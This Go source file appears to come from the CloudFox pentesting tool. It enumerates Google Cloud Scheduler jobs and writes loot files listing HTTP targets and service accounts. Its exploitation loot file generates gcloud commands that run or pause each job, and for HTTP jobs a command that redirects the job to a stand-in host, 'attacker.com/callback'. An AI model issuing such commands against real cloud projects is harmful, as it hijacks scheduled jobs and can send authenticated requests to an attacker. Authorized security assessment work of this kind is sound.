package commands

import (
	"context"
	"fmt"
	"strings"
	"sync"

	SchedulerService "github.com/BishopFox/cloudfox/gcp/services/schedulerService"
	"github.com/BishopFox/cloudfox/globals"
	"github.com/BishopFox/cloudfox/internal"
	gcpinternal "github.com/BishopFox/cloudfox/internal/gcp"
	"github.com/spf13/cobra"
)

var GCPSchedulerCommand = &cobra.Command{
	Use:     globals.GCP_SCHEDULER_MODULE_NAME,
	Aliases: []string{"cron", "jobs"},
	Short:   "Enumerate Cloud Scheduler jobs with security analysis",
	Long: `Enumerate Cloud Scheduler jobs across projects with security-relevant details.

Features:
- Lists all Cloud Scheduler jobs
- Shows target configuration (HTTP, Pub/Sub, App Engine)
- Identifies service accounts used for authentication
- Shows schedule (cron) expressions
- Displays job state and last execution status
- Generates gcloud commands for job manipulation

Security Columns:
- Target: HTTP endpoint, Pub/Sub topic, or App Engine service
- ServiceAccount: Identity used when invoking targets
- Schedule: When the job runs (cron expression)
- State: ENABLED, PAUSED, or DISABLED

Attack Surface:
- HTTP targets may call internal or external endpoints
- Service accounts may have excessive permissions
- Jobs can be modified to call attacker-controlled endpoints
- Paused jobs may indicate suspended malicious activity`,
	Run: runGCPSchedulerCommand,
}

// ------------------------------
// Module Struct
// ------------------------------
type SchedulerModule struct {
	gcpinternal.BaseGCPModule

	Jobs    []SchedulerService.JobInfo
	LootMap map[string]*internal.LootFile
	mu      sync.Mutex
}

// ------------------------------
// Output Struct
// ------------------------------
type SchedulerOutput struct {
	Table []internal.TableFile
	Loot  []internal.LootFile
}

func (o SchedulerOutput) TableFiles() []internal.TableFile { return o.Table }
func (o SchedulerOutput) LootFiles() []internal.LootFile   { return o.Loot }

// ------------------------------
// Command Entry Point
// ------------------------------
func runGCPSchedulerCommand(cmd *cobra.Command, args []string) {
	cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_SCHEDULER_MODULE_NAME)
	if err != nil {
		return
	}

	module := &SchedulerModule{
		BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx),
		Jobs:          []SchedulerService.JobInfo{},
		LootMap:       make(map[string]*internal.LootFile),
	}

	module.initializeLootFiles()
	module.Execute(cmdCtx.Ctx, cmdCtx.Logger)
}

// ------------------------------
// Module Execution
// ------------------------------
func (m *SchedulerModule) Execute(ctx context.Context, logger internal.Logger) {
	m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_SCHEDULER_MODULE_NAME, m.processProject)

	if len(m.Jobs) == 0 {
		logger.InfoM("No Cloud Scheduler jobs found", globals.GCP_SCHEDULER_MODULE_NAME)
		return
	}

	// Count job states
	enabledCount := 0
	httpCount := 0
	for _, job := range m.Jobs {
		if job.State == "ENABLED" {
			enabledCount++
		}
		if job.TargetType == "http" {
			httpCount++
		}
	}

	msg := fmt.Sprintf("Found %d job(s)", len(m.Jobs))
	if enabledCount > 0 {
		msg += fmt.Sprintf(" [%d enabled]", enabledCount)
	}
	if httpCount > 0 {
		msg += fmt.Sprintf(" [%d HTTP targets]", httpCount)
	}
	logger.SuccessM(msg, globals.GCP_SCHEDULER_MODULE_NAME)

	m.writeOutput(ctx, logger)
}

// ------------------------------
// Project Processor
// ------------------------------
func (m *SchedulerModule) processProject(ctx context.Context, projectID string, logger internal.Logger) {
	if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS {
		logger.InfoM(fmt.Sprintf("Enumerating Scheduler jobs in project: %s", projectID), globals.GCP_SCHEDULER_MODULE_NAME)
	}

	ss := SchedulerService.New()

	jobs, err := ss.Jobs(projectID)
	if err != nil {
		m.CommandCounter.Error++
		gcpinternal.HandleGCPError(err, logger, globals.GCP_SCHEDULER_MODULE_NAME,
			fmt.Sprintf("Could not enumerate Scheduler jobs in project %s", projectID))
		return
	}

	m.mu.Lock()
	m.Jobs = append(m.Jobs, jobs...)
	for _, job := range jobs {
		m.addJobToLoot(job)
	}
	m.mu.Unlock()

	if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS {
		logger.InfoM(fmt.Sprintf("Found %d job(s) in project %s", len(jobs), projectID), globals.GCP_SCHEDULER_MODULE_NAME)
	}
}

// ------------------------------
// Loot File Management
// ------------------------------
func (m *SchedulerModule) initializeLootFiles() {
	m.LootMap["scheduler-gcloud-commands"] = &internal.LootFile{
		Name:     "scheduler-gcloud-commands",
		Contents: "# Cloud Scheduler gcloud Commands\n# Generated by CloudFox\n\n",
	}
	m.LootMap["scheduler-http-targets"] = &internal.LootFile{
		Name:     "scheduler-http-targets",
		Contents: "# Cloud Scheduler HTTP Targets\n# Generated by CloudFox\n# These URLs are called by scheduled jobs\n\n",
	}
	m.LootMap["scheduler-service-accounts"] = &internal.LootFile{
		Name:     "scheduler-service-accounts",
		Contents: "# Cloud Scheduler Service Accounts\n# Generated by CloudFox\n# Service accounts used for job authentication\n\n",
	}
	m.LootMap["scheduler-exploitation"] = &internal.LootFile{
		Name:     "scheduler-exploitation",
		Contents: "# Cloud Scheduler Exploitation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n",
	}
}

func (m *SchedulerModule) addJobToLoot(job SchedulerService.JobInfo) {
	// gcloud commands
	m.LootMap["scheduler-gcloud-commands"].Contents += fmt.Sprintf(
		"# Job: %s (Project: %s, Location: %s)\n"+
			"gcloud scheduler jobs describe %s --location=%s --project=%s\n"+
			"gcloud scheduler jobs run %s --location=%s --project=%s  # Trigger immediately\n\n",
		job.Name, job.ProjectID, job.Location,
		job.Name, job.Location, job.ProjectID,
		job.Name, job.Location, job.ProjectID,
	)

	// HTTP targets
	if job.TargetType == "http" {
		m.LootMap["scheduler-http-targets"].Contents += fmt.Sprintf(
			"# Job: %s\n"+
				"# Schedule: %s (%s)\n"+
				"# Method: %s\n"+
				"# URL: %s\n"+
				"# Auth: %s\n",
			job.Name,
			job.Schedule, job.TimeZone,
			job.TargetHTTPMethod,
			job.TargetURI,
			job.AuthType,
		)
		if job.ServiceAccount != "" {
			m.LootMap["scheduler-http-targets"].Contents += fmt.Sprintf(
				"# Service Account: %s\n",
				job.ServiceAccount,
			)
		}
		m.LootMap["scheduler-http-targets"].Contents += "\n"
	}

	// Service accounts
	if job.ServiceAccount != "" {
		m.LootMap["scheduler-service-accounts"].Contents += fmt.Sprintf(
			"# Job: %s -> %s %s\n"+
				"%s\n\n",
			job.Name, job.TargetType, formatTarget(job),
			job.ServiceAccount,
		)
	}

	// Exploitation commands
	m.LootMap["scheduler-exploitation"].Contents += fmt.Sprintf(
		"# Job: %s (Project: %s)\n"+
			"# State: %s\n"+
			"# Schedule: %s (%s)\n"+
			"# Target: %s -> %s\n",
		job.Name, job.ProjectID,
		job.State,
		job.Schedule, job.TimeZone,
		job.TargetType, formatTarget(job),
	)

	if job.ServiceAccount != "" {
		m.LootMap["scheduler-exploitation"].Contents += fmt.Sprintf(
			"# Service Account: %s\n",
			job.ServiceAccount,
		)
	}

	m.LootMap["scheduler-exploitation"].Contents += fmt.Sprintf(
		"\n# Run job immediately:\n"+
			"gcloud scheduler jobs run %s --location=%s --project=%s\n\n"+
			"# Pause job:\n"+
			"gcloud scheduler jobs pause %s --location=%s --project=%s\n\n",
		job.Name, job.Location, job.ProjectID,
		job.Name, job.Location, job.ProjectID,
	)

	if job.TargetType == "http" {
		m.LootMap["scheduler-exploitation"].Contents += fmt.Sprintf(
			"# Update job to call attacker endpoint (if you have cloudscheduler.jobs.update):\n"+
				"gcloud scheduler jobs update http %s --location=%s --project=%s --uri=\"https://attacker.com/callback\"\n\n",
			job.Name, job.Location, job.ProjectID,
		)
	}
}

// ------------------------------
// Output Generation
// ------------------------------
func (m *SchedulerModule) writeOutput(ctx context.Context, logger internal.Logger) {
	// Jobs table
	header := []string{
		"Project Name",
		"Project ID",
		"Job Name",
		"Location",
		"State",
		"Schedule",
		"Target Type",
		"Target",
		"Service Account",
		"Last Run",
	}

	var body [][]string
	for _, job := range m.Jobs {
		// Format target
		target := formatTarget(job)

		// Format service account
		sa := "-"
		if job.ServiceAccount != "" {
			sa = truncateSAScheduler(job.ServiceAccount)
		}

		// Format last run
		lastRun := "-"
		if job.LastAttemptTime != "" {
			lastRun = formatTime(job.LastAttemptTime)
			if job.Status != "" && job.Status != "OK" {
				lastRun += " (FAILED)"
			}
		}

		body = append(body, []string{
			m.GetProjectName(job.ProjectID),
			job.ProjectID,
			job.Name,
			job.Location,
			job.State,
			job.Schedule,
			job.TargetType,
			target,
			sa,
			lastRun,
		})
	}

	// Collect loot files
	var lootFiles []internal.LootFile
	for _, loot := range m.LootMap {
		if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") {
			lootFiles = append(lootFiles, *loot)
		}
	}

	// Build table files
	tableFiles := []internal.TableFile{
		{
			Name:   globals.GCP_SCHEDULER_MODULE_NAME,
			Header: header,
			Body:   body,
		},
	}

	output := SchedulerOutput{
		Table: tableFiles,
		Loot:  lootFiles,
	}

	scopeNames := make([]string, len(m.ProjectIDs))
	for i, id := range m.ProjectIDs {
		scopeNames[i] = m.GetProjectName(id)
	}

	err := internal.HandleOutputSmart(
		"gcp",
		m.Format,
		m.OutputDirectory,
		m.Verbosity,
		m.WrapTable,
		"project",
		m.ProjectIDs,
		scopeNames,
		m.Account,
		output,
	)
	if err != nil {
		logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_SCHEDULER_MODULE_NAME)
		m.CommandCounter.Error++
	}
}

// Helper functions

// formatTarget formats the job target for display
func formatTarget(job SchedulerService.JobInfo) string {
	switch job.TargetType {
	case "http":
		if len(job.TargetURI) > 50 {
			return job.TargetURI[:47] + "..."
		}
		return job.TargetURI
	case "pubsub":
		return job.TargetTopic
	case "appengine":
		target := job.TargetService
		if job.TargetVersion != "" {
			target += "/" + job.TargetVersion
		}
		if job.TargetURI != "" {
			target += job.TargetURI
		}
		return target
	default:
		return "-"
	}
}

// truncateSAScheduler truncates service account for display
func truncateSAScheduler(sa string) string {
	if len(sa) > 35 {
		if idx := strings.Index(sa, "@"); idx > 0 {
			name := sa[:idx]
			if len(name) > 25 {
				return name[:22] + "...@..."
			}
			return name + "@..."
		}
		return sa[:32] + "..."
	}
	return sa
}

// formatTime formats a timestamp for display
func formatTime(timestamp string) string {
	// Timestamp is in RFC3339 format
	// Truncate to just date and time
	if len(timestamp) > 19 {
		return timestamp[:19]
	}
	return timestamp
}
